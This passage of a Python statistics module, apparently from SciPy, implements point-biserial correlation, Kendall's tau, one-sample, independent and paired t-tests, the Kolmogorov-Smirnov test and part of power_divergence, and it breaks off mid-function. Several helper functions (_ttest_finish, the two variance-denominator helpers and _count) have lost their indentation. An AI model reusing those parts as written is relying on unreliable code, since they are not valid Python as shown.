    observations coded 0 and 1 respectively; :math:`N_{0}` and :math:`N_{1}`
    are number of observations coded 0 and 1 respectively; :math:`N` is the
    total number of observations and :math:`s_{y}` is the standard
    deviation of all the metric observations.

    A value of :math:`r_{pb}` that is significantly different from zero is
    completely equivalent to a significant difference in means between the
    two groups. Thus, an independent groups t Test with :math:`N-2` degrees
    of freedom may be used to test whether :math:`r_{pb}` is nonzero. The
    relation between the t-statistic for comparing two independent groups
    and :math:`r_{pb}` is given by:

    .. math::

        t = \sqrt{N - 2}\frac{r_{pb}}{\sqrt{1 - r^{2}_{pb}}}

    References
    ----------
    .. [1] J. Lev, "The Point Biserial Coefficient of Correlation", Ann. Math.
           Statist., Vol. 20, no.1, pp. 125-126, 1949.
    .. [2] R.F. Tate, "Correlation Between a Discrete and a Continuous
           Variable. Point-Biserial Correlation.", Ann. Math. Statist., Vol. 25,
           np. 3, pp. 603-607, 1954.
    .. [3] http://onlinelibrary.wiley.com/doi/10.1002/9781118445112.stat06227/full

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.array([0, 0, 0, 1, 1, 1, 1])
    >>> b = np.arange(7)
    >>> stats.pointbiserialr(a, b)
    (0.8660254037844386, 0.011724811003954652)
    """
    PointbiserialrResult = namedtuple('PointbiserialrResult', ('correlation',
                                                               'pvalue'))
    # The point-biserial coefficient is numerically identical to Pearson's
    # r computed on the same data, so simply delegate.
    return PointbiserialrResult(*pearsonr(x, y))
def kendalltau(x, y, initial_lexsort=True, nan_policy='propagate'):
    """
    Calculates Kendall's tau, a correlation measure for ordinal data.

    Kendall's tau is a measure of the correspondence between two rankings.
    Values close to 1 indicate strong agreement, values close to -1 indicate
    strong disagreement.  This is the tau-b version of Kendall's tau which
    accounts for ties.

    Parameters
    ----------
    x, y : array_like
        Arrays of rankings, of the same shape. If arrays are not 1-D, they will
        be flattened to 1-D.
    initial_lexsort : bool, optional
        Whether to use lexsort or quicksort as the sorting method for the
        initial sort of the inputs. Default is lexsort (True), for which
        `kendalltau` is of complexity O(n log(n)). If False, the complexity is
        O(n^2), but with a smaller pre-factor (so quicksort may be faster for
        small arrays).
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    correlation : float
        The tau statistic.
    pvalue : float
        The two-sided p-value for a hypothesis test whose null hypothesis is
        an absence of association, tau = 0.

    See also
    --------
    spearmanr : Calculates a Spearman rank-order correlation coefficient.
    theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).

    Notes
    -----
    The definition of Kendall's tau that is used is::

      tau = (P - Q) / sqrt((P + Q + T) * (P + Q + U))

    where P is the number of concordant pairs, Q the number of discordant
    pairs, T the number of ties only in `x`, and U the number of ties only in
    `y`.  If a tie occurs for the same pair in both `x` and `y`, it is not
    added to either T or U.

    References
    ----------
    W.R. Knight, "A Computer Method for Calculating Kendall's Tau with
    Ungrouped Data", Journal of the American Statistical Association, Vol. 61,
    No. 314, Part 1, pp. 436-439, 1966.

    Examples
    --------
    >>> from scipy import stats
    >>> x1 = [12, 2, 1, 12, 2]
    >>> x2 = [1, 4, 7, 1, 0]
    >>> tau, p_value = stats.kendalltau(x1, x2)
    >>> tau
    -0.47140452079103173
    >>> p_value
    0.24821309157521476

    """
    x = np.asarray(x).ravel()
    y = np.asarray(y).ravel()
    KendalltauResult = namedtuple('KendalltauResult', ('correlation', 'pvalue'))

    if x.size != y.size:
        raise ValueError("All inputs to `kendalltau` must be of the same size, "
                         "found x-size %s and y-size %s" % (x.size, y.size))
    elif not x.size or not y.size:
        return KendalltauResult(np.nan, np.nan)  # Return NaN if arrays are empty

    # Check both x and y for nans.  BUG FIX: the previous code combined the
    # two checks as `_contains_nan(x, ...) or _contains_nan(y, ...)`; both
    # calls return a non-empty tuple, which is always truthy, so the `or`
    # always yielded the result for `x` alone and nans in `y` were ignored.
    contains_nan_x, nan_policy_x = _contains_nan(x, nan_policy)
    contains_nan_y, nan_policy_y = _contains_nan(y, nan_policy)
    contains_nan = contains_nan_x or contains_nan_y
    if nan_policy_x == 'omit' or nan_policy_y == 'omit':
        nan_policy = 'omit'

    if contains_nan and nan_policy == 'propagate':
        return KendalltauResult(np.nan, np.nan)
    elif contains_nan and nan_policy == 'omit':
        x = ma.masked_invalid(x)
        y = ma.masked_invalid(y)
        return mstats_basic.kendalltau(x, y)

    n = np.int64(len(x))
    temp = list(range(n))  # support structure used by mergesort

    # this closure recursively sorts sections of perm[] by comparing
    # elements of y[perm[]] using temp[] as support
    # returns the number of swaps required by an equivalent bubble sort
    def mergesort(offs, length):
        exchcnt = 0
        if length == 1:
            return 0
        if length == 2:
            if y[perm[offs]] <= y[perm[offs+1]]:
                return 0
            t = perm[offs]
            perm[offs] = perm[offs+1]
            perm[offs+1] = t
            return 1
        length0 = length // 2
        length1 = length - length0
        middle = offs + length0
        exchcnt += mergesort(offs, length0)
        exchcnt += mergesort(middle, length1)
        if y[perm[middle - 1]] < y[perm[middle]]:
            return exchcnt
        # merging
        i = j = k = 0
        while j < length0 or k < length1:
            if k >= length1 or (j < length0 and y[perm[offs + j]] <=
                                                y[perm[middle + k]]):
                temp[i] = perm[offs + j]
                d = i - j
                j += 1
            else:
                temp[i] = perm[middle + k]
                d = (offs + i) - (middle + k)
                k += 1
            if d > 0:
                exchcnt += d
            i += 1
        perm[offs:offs+length] = temp[0:length]
        return exchcnt

    # initial sort on values of x and, if tied, on values of y
    if initial_lexsort:
        # sort implemented as mergesort, worst case: O(n log(n))
        perm = np.lexsort((y, x))
    else:
        # sort implemented as quicksort, 30% faster but with worst case: O(n^2)
        perm = list(range(n))
        perm.sort(key=lambda a: (x[a], y[a]))

    # compute joint ties (use the py2/py3-portable `range`, not `xrange`)
    first = 0
    t = 0
    for i in range(1, n):
        if x[perm[first]] != x[perm[i]] or y[perm[first]] != y[perm[i]]:
            t += ((i - first) * (i - first - 1)) // 2
            first = i
    t += ((n - first) * (n - first - 1)) // 2

    # compute ties in x
    first = 0
    u = 0
    for i in range(1, n):
        if x[perm[first]] != x[perm[i]]:
            u += ((i - first) * (i - first - 1)) // 2
            first = i
    u += ((n - first) * (n - first - 1)) // 2

    # count exchanges
    exchanges = mergesort(0, n)

    # compute ties in y after mergesort with counting
    first = 0
    v = 0
    for i in range(1, n):
        if y[perm[first]] != y[perm[i]]:
            v += ((i - first) * (i - first - 1)) // 2
            first = i
    v += ((n - first) * (n - first - 1)) // 2

    tot = (n * (n - 1)) // 2
    if tot == u or tot == v:
        # Special case for all ties in both ranks
        return KendalltauResult(np.nan, np.nan)

    # Prevent overflow; equal to np.sqrt((tot - u) * (tot - v))
    denom = np.exp(0.5 * (np.log(tot - u) + np.log(tot - v)))
    tau = ((tot - (v + u - t)) - 2.0 * exchanges) / denom

    # what follows reproduces the ending of Gary Strangman's original
    # stats.kendalltau() in SciPy
    svar = (4.0 * n + 10.0) / (9.0 * n * (n - 1))
    z = tau / np.sqrt(svar)
    prob = special.erfc(np.abs(z) / 1.4142136)

    return KendalltauResult(tau, prob)
#####################################
# INFERENTIAL STATISTICS #
#####################################
def ttest_1samp(a, popmean, axis=0, nan_policy='propagate'):
    """
    Calculates the T-test for the mean of ONE group of scores.

    Two-sided test of the null hypothesis that the expected value (mean)
    of a sample of independent observations `a` equals the given
    population mean, `popmean`.

    Parameters
    ----------
    a : array_like
        Sample observation.
    popmean : float or array_like
        Expected value in the null hypothesis; if array_like, it must have
        the same shape as `a` excluding the axis dimension.
    axis : int or None, optional
        Axis along which to compute the test.  If None, compute over the
        whole array `a`.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' performs the calculations
        ignoring nan values. Default is 'propagate'.

    Returns
    -------
    statistic : float or array
        t-statistic.
    pvalue : float or array
        Two-tailed p-value.

    Examples
    --------
    >>> from scipy import stats
    >>> np.random.seed(7654567)  # fix seed to get the same result
    >>> rvs = stats.norm.rvs(loc=5, scale=10, size=(50,2))
    >>> stats.ttest_1samp(rvs, 5.0)
    (array([-0.68014479, -0.04323899]), array([ 0.49961383,  0.96568674]))
    >>> stats.ttest_1samp(rvs, 0.0)
    (array([ 2.77025808,  4.11038784]), array([ 0.00789095,  0.00014999]))

    """
    a, axis = _chk_asarray(a, axis)
    Ttest_1sampResult = namedtuple('Ttest_1sampResult', ('statistic', 'pvalue'))

    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan and nan_policy == 'omit':
        # Delegate to the masked-array implementation, ignoring nans.
        return mstats_basic.ttest_1samp(ma.masked_invalid(a), popmean, axis)

    num = a.shape[axis]
    dof = num - 1

    # t = (sample mean - popmean) / standard error of the mean
    mean_diff = np.mean(a, axis) - popmean
    std_err = np.sqrt(np.var(a, axis, ddof=1) / float(num))
    statistic, pvalue = _ttest_finish(dof, np.divide(mean_diff, std_err))

    return Ttest_1sampResult(statistic, pvalue)
def _ttest_finish(df, t):
"""Common code between all 3 t-test functions."""
prob = distributions.t.sf(np.abs(t), df) * 2 # use np.abs to get upper tail
if t.ndim == 0:
t = t[()]
return t, prob
def _ttest_ind_from_stats(mean1, mean2, denom, df):
    # t statistic: the difference of the means over its standard error.
    diff = mean1 - mean2
    stat, pval = _ttest_finish(df, np.divide(diff, denom))
    return (stat, pval)
def _unequal_var_ttest_denom(v1, n1, v2, n2):
vn1 = v1 / n1
vn2 = v2 / n2
df = ((vn1 + vn2)**2) / ((vn1**2) / (n1 - 1) + (vn2**2) / (n2 - 1))
# If df is undefined, variances are zero (assumes n1 > 0 & n2 > 0).
# Hence it doesn't matter what df is as long as it's not NaN.
df = np.where(np.isnan(df), 1, df)
denom = np.sqrt(vn1 + vn2)
return df, denom
def _equal_var_ttest_denom(v1, n1, v2, n2):
df = n1 + n2 - 2
svar = ((n1 - 1) * v1 + (n2 - 1) * v2) / float(df)
denom = np.sqrt(svar * (1.0 / n1 + 1.0 / n2))
return df, denom
def ttest_ind_from_stats(mean1, std1, nobs1, mean2, std2, nobs2,
                         equal_var=True):
    """
    T-test for means of two independent samples from descriptive statistics.

    Two-sided test of the null hypothesis that two independent samples have
    identical average (expected) values, given only their summary statistics.

    Parameters
    ----------
    mean1 : array_like
        The mean(s) of sample 1.
    std1 : array_like
        The standard deviation(s) of sample 1.
    nobs1 : array_like
        The number(s) of observations of sample 1.
    mean2 : array_like
        The mean(s) of sample 2.
    std2 : array_like
        The standard deviation(s) of sample 2.
    nobs2 : array_like
        The number(s) of observations of sample 2.
    equal_var : bool, optional
        If True (default), perform a standard independent 2 sample test
        that assumes equal population variances [1]_.  If False, perform
        Welch's t-test, which does not assume equal population variance
        [2]_.

    Returns
    -------
    statistic : float or array
        The calculated t-statistics.
    pvalue : float or array
        The two-tailed p-value.

    See also
    --------
    scipy.stats.ttest_ind

    Notes
    -----
    .. versionadded:: 0.16.0

    References
    ----------
    .. [1] http://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
    .. [2] http://en.wikipedia.org/wiki/Welch%27s_t_test

    """
    # Pick the pooled-variance or Welch denominator/dof from the
    # (variance, count) summaries.
    denom_func = _equal_var_ttest_denom if equal_var else _unequal_var_ttest_denom
    df, denom = denom_func(std1**2, nobs1, std2**2, nobs2)

    Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))
    return Ttest_indResult(*_ttest_ind_from_stats(mean1, mean2, denom, df))
def ttest_ind(a, b, axis=0, equal_var=True, nan_policy='propagate'):
    """
    Calculates the T-test for the means of TWO INDEPENDENT samples of scores.

    This is a two-sided test for the null hypothesis that 2 independent samples
    have identical average (expected) values. This test assumes that the
    populations have identical variances by default.

    Parameters
    ----------
    a, b : array_like
        The arrays must have the same shape, except in the dimension
        corresponding to `axis` (the first, by default).
    axis : int or None, optional
        Axis along which to compute test. If None, compute over the whole
        arrays, `a`, and `b`.
    equal_var : bool, optional
        If True (default), perform a standard independent 2 sample test
        that assumes equal population variances [1]_.
        If False, perform Welch's t-test, which does not assume equal
        population variance [2]_.

        .. versionadded:: 0.11.0

    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    statistic : float or array
        The calculated t-statistic.
    pvalue : float or array
        The two-tailed p-value.

    Notes
    -----
    We can use this test, if we observe two independent samples from
    the same or different population, e.g. exam scores of boys and
    girls or of two ethnic groups. The test measures whether the
    average (expected) value differs significantly across samples. If
    we observe a large p-value, for example larger than 0.05 or 0.1,
    then we cannot reject the null hypothesis of identical average scores.
    If the p-value is smaller than the threshold, e.g. 1%, 5% or 10%,
    then we reject the null hypothesis of equal averages.

    References
    ----------
    .. [1] http://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
    .. [2] http://en.wikipedia.org/wiki/Welch%27s_t_test

    Examples
    --------
    >>> from scipy import stats
    >>> np.random.seed(12345678)

    Test with sample with identical means:

    >>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
    >>> rvs2 = stats.norm.rvs(loc=5,scale=10,size=500)
    >>> stats.ttest_ind(rvs1,rvs2)
    (0.26833823296239279, 0.78849443369564776)
    >>> stats.ttest_ind(rvs1,rvs2, equal_var = False)
    (0.26833823296239279, 0.78849452749500748)

    `ttest_ind` underestimates p for unequal variances:

    >>> rvs3 = stats.norm.rvs(loc=5, scale=20, size=500)
    >>> stats.ttest_ind(rvs1, rvs3)
    (-0.46580283298287162, 0.64145827413436174)
    >>> stats.ttest_ind(rvs1, rvs3, equal_var = False)
    (-0.46580283298287162, 0.64149646246569292)

    When n1 != n2, the equal variance t-statistic is no longer equal to the
    unequal variance t-statistic:

    >>> rvs4 = stats.norm.rvs(loc=5, scale=20, size=100)
    >>> stats.ttest_ind(rvs1, rvs4)
    (-0.99882539442782481, 0.3182832709103896)
    >>> stats.ttest_ind(rvs1, rvs4, equal_var = False)
    (-0.69712570584654099, 0.48716927725402048)

    T-test with different means, variance, and n:

    >>> rvs5 = stats.norm.rvs(loc=8, scale=20, size=100)
    >>> stats.ttest_ind(rvs1, rvs5)
    (-1.4679669854490653, 0.14263895620529152)
    >>> stats.ttest_ind(rvs1, rvs5, equal_var = False)
    (-0.94365973617132992, 0.34744170334794122)

    """
    a, b, axis = _chk2_asarray(a, b, axis)
    Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))

    # Check both a and b for nans.  BUG FIX: `_contains_nan(a, ...) or
    # _contains_nan(b, ...)` is wrong -- both calls return a non-empty
    # tuple, which is always truthy, so the `or` always yielded the result
    # for `a` alone and nans in `b` were silently ignored.
    contains_nan_a, nan_policy_a = _contains_nan(a, nan_policy)
    contains_nan_b, nan_policy_b = _contains_nan(b, nan_policy)
    contains_nan = contains_nan_a or contains_nan_b
    if nan_policy_a == 'omit' or nan_policy_b == 'omit':
        nan_policy = 'omit'

    if contains_nan and nan_policy == 'omit':
        a = ma.masked_invalid(a)
        b = ma.masked_invalid(b)
        return mstats_basic.ttest_ind(a, b, axis, equal_var)

    if a.size == 0 or b.size == 0:
        return Ttest_indResult(np.nan, np.nan)

    v1 = np.var(a, axis, ddof=1)
    v2 = np.var(b, axis, ddof=1)
    n1 = a.shape[axis]
    n2 = b.shape[axis]

    if equal_var:
        df, denom = _equal_var_ttest_denom(v1, n1, v2, n2)
    else:
        df, denom = _unequal_var_ttest_denom(v1, n1, v2, n2)

    res = _ttest_ind_from_stats(np.mean(a, axis), np.mean(b, axis), denom, df)
    return Ttest_indResult(*res)
def ttest_rel(a, b, axis=0, nan_policy='propagate'):
    """
    Calculates the T-test on TWO RELATED samples of scores, a and b.

    This is a two-sided test for the null hypothesis that 2 related or
    repeated samples have identical average (expected) values.

    Parameters
    ----------
    a, b : array_like
        The arrays must have the same shape.
    axis : int or None, optional
        Axis along which to compute test. If None, compute over the whole
        arrays, `a`, and `b`.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    statistic : float or array
        t-statistic.
    pvalue : float or array
        two-tailed p-value.

    Notes
    -----
    Examples for the use are scores of the same set of student in
    different exams, or repeated sampling from the same units. The
    test measures whether the average score differs significantly
    across samples (e.g. exams). If we observe a large p-value, for
    example greater than 0.05 or 0.1 then we cannot reject the null
    hypothesis of identical average scores. If the p-value is smaller
    than the threshold, e.g. 1%, 5% or 10%, then we reject the null
    hypothesis of equal averages. Small p-values are associated with
    large t-statistics.

    References
    ----------
    http://en.wikipedia.org/wiki/T-test#Dependent_t-test

    Examples
    --------
    >>> from scipy import stats
    >>> np.random.seed(12345678)  # fix random seed to get same numbers

    >>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
    >>> rvs2 = (stats.norm.rvs(loc=5,scale=10,size=500) +
    ...         stats.norm.rvs(scale=0.2,size=500))
    >>> stats.ttest_rel(rvs1,rvs2)
    (0.24101764965300962, 0.80964043445811562)
    >>> rvs3 = (stats.norm.rvs(loc=8,scale=10,size=500) +
    ...         stats.norm.rvs(scale=0.2,size=500))
    >>> stats.ttest_rel(rvs1,rvs3)
    (-3.9995108708727933, 7.3082402191726459e-005)

    """
    a, b, axis = _chk2_asarray(a, b, axis)
    Ttest_relResult = namedtuple('Ttest_relResult', ('statistic', 'pvalue'))

    # Check both a and b for nans.  BUG FIX: the previous code joined the
    # two (contains_nan, nan_policy) tuples with `or`; non-empty tuples are
    # always truthy, so nans in `b` were silently ignored.
    contains_nan_a, nan_policy_a = _contains_nan(a, nan_policy)
    contains_nan_b, nan_policy_b = _contains_nan(b, nan_policy)
    contains_nan = contains_nan_a or contains_nan_b
    if nan_policy_a == 'omit' or nan_policy_b == 'omit':
        nan_policy = 'omit'

    if contains_nan and nan_policy == 'omit':
        # BUG FIX: mask invalid entries in *both* arrays (previously only
        # `a` was masked, so nans in `b` leaked into the computation).
        a = ma.masked_invalid(a)
        b = ma.masked_invalid(b)
        return mstats_basic.ttest_rel(a, b, axis)

    if a.shape[axis] != b.shape[axis]:
        raise ValueError('unequal length arrays')
    if a.size == 0 or b.size == 0:
        # Return the namedtuple result type for consistency with
        # `ttest_ind` (a bare tuple was returned here before).
        return Ttest_relResult(np.nan, np.nan)

    n = a.shape[axis]
    df = float(n - 1)

    # Paired test: a one-sample t-test on the per-pair differences.
    d = (a - b).astype(np.float64)
    v = np.var(d, axis, ddof=1)
    dm = np.mean(d, axis)
    denom = np.sqrt(v / float(n))

    t = np.divide(dm, denom)
    t, prob = _ttest_finish(df, t)

    return Ttest_relResult(t, prob)
def kstest(rvs, cdf, args=(), N=20, alternative='two-sided', mode='approx'):
    """
    Perform the Kolmogorov-Smirnov test for goodness of fit.
    This performs a test of the distribution G(x) of an observed
    random variable against a given distribution F(x). Under the null
    hypothesis the two distributions are identical, G(x)=F(x). The
    alternative hypothesis can be either 'two-sided' (default), 'less'
    or 'greater'. The KS test is only valid for continuous distributions.
    Parameters
    ----------
    rvs : str, array or callable
        If a string, it should be the name of a distribution in `scipy.stats`.
        If an array, it should be a 1-D array of observations of random
        variables.
        If a callable, it should be a function to generate random variables;
        it is required to have a keyword argument `size`.
    cdf : str or callable
        If a string, it should be the name of a distribution in `scipy.stats`.
        If `rvs` is a string then `cdf` can be False or the same as `rvs`.
        If a callable, that callable is used to calculate the cdf.
    args : tuple, sequence, optional
        Distribution parameters, used if `rvs` or `cdf` are strings.
    N : int, optional
        Sample size if `rvs` is string or callable. Default is 20.
    alternative : {'two-sided', 'less','greater'}, optional
        Defines the alternative hypothesis (see explanation above).
        Default is 'two-sided'.
    mode : 'approx' (default) or 'asymp', optional
        Defines the distribution used for calculating the p-value.
        - 'approx' : use approximation to exact distribution of test statistic
        - 'asymp' : use asymptotic distribution of test statistic
    Returns
    -------
    statistic : float
        KS test statistic, either D, D+ or D-.
    pvalue :  float
        One-tailed or two-tailed p-value.
    Notes
    -----
    In the one-sided test, the alternative is that the empirical
    cumulative distribution function of the random variable is "less"
    or "greater" than the cumulative distribution function F(x) of the
    hypothesis, ``G(x)<=F(x)``, resp. ``G(x)>=F(x)``.
    Examples
    --------
    >>> from scipy import stats
    >>> x = np.linspace(-15, 15, 9)
    >>> stats.kstest(x, 'norm')
    (0.44435602715924361, 0.038850142705171065)
    >>> np.random.seed(987654321) # set random seed to get the same result
    >>> stats.kstest('norm', False, N=100)
    (0.058352892479417884, 0.88531190944151261)
    The above lines are equivalent to:
    >>> np.random.seed(987654321)
    >>> stats.kstest(stats.norm.rvs(size=100), 'norm')
    (0.058352892479417884, 0.88531190944151261)
    *Test against one-sided alternative hypothesis*
    Shift distribution to larger values, so that ``cdf_dgp(x) < norm.cdf(x)``:
    >>> np.random.seed(987654321)
    >>> x = stats.norm.rvs(loc=0.2, size=100)
    >>> stats.kstest(x,'norm', alternative = 'less')
    (0.12464329735846891, 0.040989164077641749)
    Reject equal distribution against alternative hypothesis: less
    >>> stats.kstest(x,'norm', alternative = 'greater')
    (0.0072115233216311081, 0.98531158590396395)
    Don't reject equal distribution against alternative hypothesis: greater
    >>> stats.kstest(x,'norm', mode='asymp')
    (0.12464329735846891, 0.08944488871182088)
    *Testing t distributed random variables against normal distribution*
    With 100 degrees of freedom the t distribution looks close to the normal
    distribution, and the K-S test does not reject the hypothesis that the
    sample came from the normal distribution:
    >>> np.random.seed(987654321)
    >>> stats.kstest(stats.t.rvs(100,size=100),'norm')
    (0.072018929165471257, 0.67630062862479168)
    With 3 degrees of freedom the t distribution looks sufficiently different
    from the normal distribution, that we can reject the hypothesis that the
    sample came from the normal distribution at the 10% level:
    >>> np.random.seed(987654321)
    >>> stats.kstest(stats.t.rvs(3,size=100),'norm')
    (0.131016895759829, 0.058826222555312224)
    """
    # `rvs` given as a distribution name: sample from that distribution,
    # and allow `cdf` to be omitted (falsy) or to repeat the same name.
    if isinstance(rvs, string_types):
        if (not cdf) or (cdf == rvs):
            cdf = getattr(distributions, rvs).cdf
            rvs = getattr(distributions, rvs).rvs
        else:
            raise AttributeError("if rvs is string, cdf has to be the "
                                 "same distribution")
    # `cdf` given as a distribution name: resolve it to the cdf callable.
    if isinstance(cdf, string_types):
        cdf = getattr(distributions, cdf).cdf
    if callable(rvs):
        # `rvs` is a sampler; it must accept a `size` keyword.
        kwds = {'size': N}
        vals = np.sort(rvs(*args, **kwds))
    else:
        # `rvs` is the data itself; N is taken from the data length.
        vals = np.sort(rvs)
        N = len(vals)
    cdfvals = cdf(vals, *args)
    # to not break compatibility with existing code
    if alternative == 'two_sided':
        alternative = 'two-sided'
    KstestResult = namedtuple('KstestResult', ('statistic', 'pvalue'))
    if alternative in ['two-sided', 'greater']:
        # D+: largest amount by which the empirical CDF exceeds the
        # hypothesized CDF.
        Dplus = (np.arange(1.0, N + 1)/N - cdfvals).max()
        if alternative == 'greater':
            return KstestResult(Dplus, distributions.ksone.sf(Dplus, N))
    if alternative in ['two-sided', 'less']:
        # D-: largest amount by which the hypothesized CDF exceeds the
        # empirical CDF.
        Dmin = (cdfvals - np.arange(0.0, N)/N).max()
        if alternative == 'less':
            return KstestResult(Dmin, distributions.ksone.sf(Dmin, N))
    if alternative == 'two-sided':
        D = np.max([Dplus, Dmin])
        if mode == 'asymp':
            return KstestResult(D, distributions.kstwobign.sf(D * np.sqrt(N)))
        if mode == 'approx':
            pval_two = distributions.kstwobign.sf(D * np.sqrt(N))
            # Use the asymptotic two-sided distribution for large N or
            # already-large p-values; otherwise double the exact one-sided
            # p-value.  NOTE(review): the N > 2666 / 0.80 - N*0.3/1000
            # cutoffs look empirical -- confirm against the original source.
            if N > 2666 or pval_two > 0.80 - N*0.3/1000:
                return KstestResult(D,
                                    distributions.kstwobign.sf(D * np.sqrt(N)))
            else:
                return KstestResult(D, 2 * distributions.ksone.sf(D, N))
    # NOTE(review): an unrecognized `alternative`/`mode` combination falls
    # through here and implicitly returns None.
# Map from names to lambda_ values used in power_divergence().
# Each entry is a named member of the Cressie-Read power divergence family.
_power_div_lambda_names = {
    "pearson": 1,               # Pearson's chi-squared statistic
    "log-likelihood": 0,        # log-likelihood ratio (G-test)
    "freeman-tukey": -0.5,      # Freeman-Tukey statistic
    "mod-log-likelihood": -1,   # modified log-likelihood ratio
    "neyman": -2,               # Neyman's statistic
    "cressie-read": 2/3,        # power recommended by Cressie & Read (1984)
}
def _count(a, axis=None):
"""
Count the number of non-masked elements of an array.
This function behaves like np.ma.count(), but is much faster
for ndarrays.
"""
if hasattr(a, 'count'):
num = a.count(axis=axis)
if isinstance(num, np.ndarray) and num.ndim == 0:
# In some cases, the `count` method returns a scalar array (e.g.
# np.array(3)), but we want a plain integer.
num = int(num)
else:
if axis is None:
num = a.size
else:
num = a.shape[axis]
return num
def power_divergence(f_obs, f_exp=None, ddof=0, axis=0, lambda_=None):
    """
    Cressie-Read power divergence statistic and goodness of fit test.

    This function tests the null hypothesis that the categorical data
    has the given frequencies, using the Cressie-Read power divergence
    statistic.

    Parameters
    ----------
    f_obs : array_like
        Observed frequencies in each category.
    f_exp : array_like, optional
        Expected frequencies in each category.  By default the categories
        are assumed to be equally likely.
    ddof : int, optional
        "Delta degrees of freedom": adjustment to the degrees of freedom
        for the p-value.  The p-value is computed using a chi-squared
        distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
        is the number of observed frequencies.  The default value of
        `ddof` is 0.
    axis : int or None, optional
        The axis of the broadcast result of `f_obs` and `f_exp` along
        which to apply the test.  If axis is None, all values in `f_obs`
        are treated as a single data set.  Default is 0.
    lambda_ : float or str, optional
        `lambda_` gives the power in the Cressie-Read power divergence
        statistic.  The default is 1.  For convenience, `lambda_` may be
        assigned one of the following strings, in which case the
        corresponding numerical value is used::

            String              Value   Description
            "pearson"             1     Pearson's chi-squared statistic.
                                        In this case, the function is
                                        equivalent to `stats.chisquare`.
            "log-likelihood"      0     Log-likelihood ratio. Also known as
                                        the G-test [3]_.
            "freeman-tukey"      -1/2   Freeman-Tukey statistic.
            "mod-log-likelihood" -1     Modified log-likelihood ratio.
            "neyman"             -2     Neyman's statistic.
            "cressie-read"        2/3   The power recommended in [5]_.

    Returns
    -------
    statistic : float or ndarray
        The Cressie-Read power divergence test statistic.  The value is
        a float if `axis` is None or if `f_obs` and `f_exp` are 1-D.
    pvalue : float or ndarray
        The p-value of the test.  The value is a float if `ddof` and the
        return value `stat` are scalars.

    See Also
    --------
    chisquare

    Notes
    -----
    This test is invalid when the observed or expected frequencies in each
    category are too small.  A typical rule is that all of the observed
    and expected frequencies should be at least 5.

    When `lambda_` is less than zero, the formula for the statistic involves
    dividing by `f_obs`, so a warning or error may be generated if any value
    in `f_obs` is 0.  Similarly, a warning or error may be generated if any
    value in `f_exp` is zero when `lambda_` >= 0.

    The default degrees of freedom, k-1, are for the case when no parameters
    of the distribution are estimated.  If p parameters are estimated by
    efficient maximum likelihood then the correct degrees of freedom are
    k-1-p.  If the parameters are estimated in a different way, then the
    dof can be between k-1-p and k-1.  However, it is also possible that
    the asymptotic distribution is not a chisquare, in which case this
    test is not appropriate.

    This function handles masked arrays.  If an element of `f_obs` or
    `f_exp` is masked, then data at that position is ignored, and does not
    count towards the size of the data set.

    .. versionadded:: 0.13.0

    References
    ----------
    .. [1] Lowry, Richard. "Concepts and Applications of Inferential
           Statistics". Chapter 8. http://faculty.vassar.edu/lowry/ch8pt1.html
    .. [2] "Chi-squared test", http://en.wikipedia.org/wiki/Chi-squared_test
    .. [3] "G-test", http://en.wikipedia.org/wiki/G-test
    .. [4] Sokal, R. R. and Rohlf, F. J. "Biometry: the principles and
           practice of statistics in biological research", New York: Freeman
           (1981)
    .. [5] Cressie, N. and Read, T. R. C., "Multinomial Goodness-of-Fit
           Tests", J. Royal Stat. Soc. Series B, Vol. 46, No. 3 (1984),
           pp. 440-464.

    Examples
    --------
    Perform a G-test (i.e. use the log-likelihood ratio statistic):

    >>> from scipy.stats import power_divergence
    >>> power_divergence([16, 18, 16, 14, 12, 12], lambda_='log-likelihood')
    (2.006573162632538, 0.84823476779463769)

    The expected frequencies can be given with the `f_exp` argument:

    >>> power_divergence([16, 18, 16, 14, 12, 12],
    ...                  f_exp=[16, 16, 16, 16, 16, 8],
    ...                  lambda_='log-likelihood')
    (3.3281031458963746, 0.6495419288047497)

    When `f_obs` is 2-D, by default the test is applied to each column:

    >>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
    >>> power_divergence(obs, lambda_="log-likelihood")
    (array([ 2.00657316,  6.77634498]), array([ 0.84823477,  0.23781225]))

    `ddof` is the change to make to the default degrees of freedom, and is
    broadcast against the statistic:

    >>> power_divergence([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
    (2.0, array([ 0.84914504,  0.73575888,  0.5724067 ]))

    """
    # Resolve `lambda_`: a family-member name, None (meaning Pearson),
    # or a numeric power.
    if isinstance(lambda_, string_types):
        if lambda_ not in _power_div_lambda_names:
            names = repr(list(_power_div_lambda_names.keys()))[1:-1]
            raise ValueError("invalid string for lambda_: {0!r}. Valid strings "
                             "are {1}".format(lambda_, names))
        lambda_ = _power_div_lambda_names[lambda_]
    elif lambda_ is None:
        lambda_ = 1

    f_obs = np.asanyarray(f_obs)

    if f_exp is None:
        # Default expectation: the mean of the observed frequencies, with
        # the reduced axis kept as size 1 so it broadcasts against `f_obs`.
        # (Equivalent to f_obs.mean(axis=axis, keepdims=True); older numpy
        # lacks `keepdims`.)  'invalid' fp errors are ignored so an empty
        # data set is handled without spurious warnings.
        with np.errstate(invalid='ignore'):
